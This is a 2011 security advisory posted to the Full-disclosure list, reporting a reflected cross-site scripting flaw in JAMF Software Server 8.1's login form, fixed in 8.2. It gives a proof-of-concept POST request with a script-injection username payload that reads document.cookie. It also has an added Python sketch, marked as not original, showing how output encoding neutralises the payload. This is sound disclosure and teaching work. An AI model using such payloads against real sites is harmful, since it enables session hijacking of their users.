List: full-disclosure
Subject: [Full-disclosure] [Foreground Security 2011-001]: Casper Suite (JSS
From: Jose Carlos de Arriba <jcarriba () foregroundsecurity ! com>
Date: 2011-08-27 18:50:35
Message-ID: ADCAC56A09E84A4D8E31044C72B6D31E31BB84C267 () 34093-MBX-C14 ! mex07a ! mlsrvr ! com
============================================================
FOREGROUND SECURITY, SECURITY ADVISORY 2011-001
- Original release date: August 27, 2011
- Discovered by: Jose Carlos de Arriba
- Contact: (jcarriba (at) foregroundsecurity (dot) com, dade (at) painsec (dot) com)
- Severity: 4.3/10 (Base CVSS Score)
============================================================
I. VULNERABILITY
-------------------------
Casper Suite - JAMF Software Server (JSS) 8.1 Cross-Site Scripting - XSS (prior versions have not been checked but could be vulnerable too).
II. BACKGROUND
-------------------------
JAMF Software Server (JSS). The JSS is the central core to the Casper Suite and ties all the other components together. The Casper Suite simplifies the life of system administrators with a comprehensive platform to manage Mac OS X computers and iOS mobile devices. The Casper Suite increases the efficiency of your IT staff, reduces the cost of ownership, and minimizes liability by providing a framework that enforces software licensing compliance, security standards, energy usage, and other organizational rules and requirements.
III. DESCRIPTION
-------------------------
JAMF Software Server (JSS) has a Cross-Site Scripting vulnerability in the "username" parameter of its login page, caused by insufficient sanitization of user-supplied data and insufficient output encoding. A malicious user could perform session hijacking or phishing attacks.
IV. PROOF OF CONCEPT
-------------------------
POST /index.html HTTP/1.1
Content-Length: 94
Content-Type: application/x-www-form-urlencoded
Cookie: JSESSIONID=XXXXXXXXXXXXXXX; JSESSIONID=YYYYYYYYYYYYYY; JSESSIONID=ZZZZZZZZZZZZZZZZZZZZ; tsfrwquc=""
Host: X.X.X.X:443
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
password=ForegroundSecurity&submit=Login&username="><script>alert(document.cookie)</alert>
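Added example, not part of the original advisory and not JAMF's code: a Python sketch of why the reflected "username" value is dangerous and how attribute-context output encoding neutralizes it. The form markup and all function names are assumptions made for illustration; only the username value is taken from the request above.

```python
from html import escape
from html.parser import HTMLParser

# Constructed login-form fragment; the real JSS markup is not shown in the advisory.
FORM = '<form method="post"><input type="text" name="username" value="{}"></form>'

# The username value from the advisory's proof of concept, reproduced verbatim.
POC_USERNAME = '"><script>alert(document.cookie)</alert>'


def render_unsafe(username: str) -> str:
    """Reflect the submitted value without encoding (the flaw described)."""
    return FORM.format(username)


def render_encoded(username: str) -> str:
    """Encode for an HTML attribute context: &, <, >, " and ' become entities."""
    return FORM.format(escape(username, quote=True))


class FormAudit(HTMLParser):
    """Records every element opened and the username value a parser would see."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.tags = []
        self.username_value = None

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        attrs = dict(attrs)
        if tag == "input" and attrs.get("name") == "username":
            self.username_value = attrs.get("value")


def audit(page: str):
    """Return (elements opened, username value as parsed from the markup)."""
    parser = FormAudit()
    parser.feed(page)
    parser.close()
    return parser.tags, parser.username_value


if __name__ == "__main__":
    for render in (render_unsafe, render_encoded):
        print(render.__name__, audit(render(POC_USERNAME)))
```

In the unencoded page the quote closes the value attribute early and a script element appears in the parsed document; in the encoded page the same input survives intact as attribute data.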
V. BUSINESS IMPACT
-------------------------
An attacker could perform session hijacking or phishing attacks.
VI. SYSTEMS AFFECTED
-------------------------
JAMF Software Server (JSS) 8.1 (prior versions have not been checked but could be vulnerable too).
VII. SOLUTION
-------------------------
Fixed in version 8.2.
VIII. REFERENCES
-------------------------
http://www.jamfsoftware.com/
http://www.foregroundsecurity.com/
http://www.painsec.com
IX. CREDITS
-------------------------
This vulnerability was discovered by Jose Carlos de Arriba (jcarriba (at) foregroundsecurity (dot) com, dade (at) painsec (dot) com).
X. REVISION HISTORY
-------------------------
-
XI. DISCLOSURE TIMELINE
-------------------------
April 25, 2011: Vulnerability discovered by Jose Carlos de Arriba.
April 25, 2011: Vendor contacted by email (No response)
May 11, 2011: Vendor contacted by phone and security advisory sent by email.
July 8, 2011: Vulnerability fixed in the 8.2 release
August 27, 2011: Advisory released
XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Jose Carlos de Arriba, CISSP
Senior Security Analyst
Foreground Security
www.foregroundsecurity.com
jcarriba@foregroundsecurity.com
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/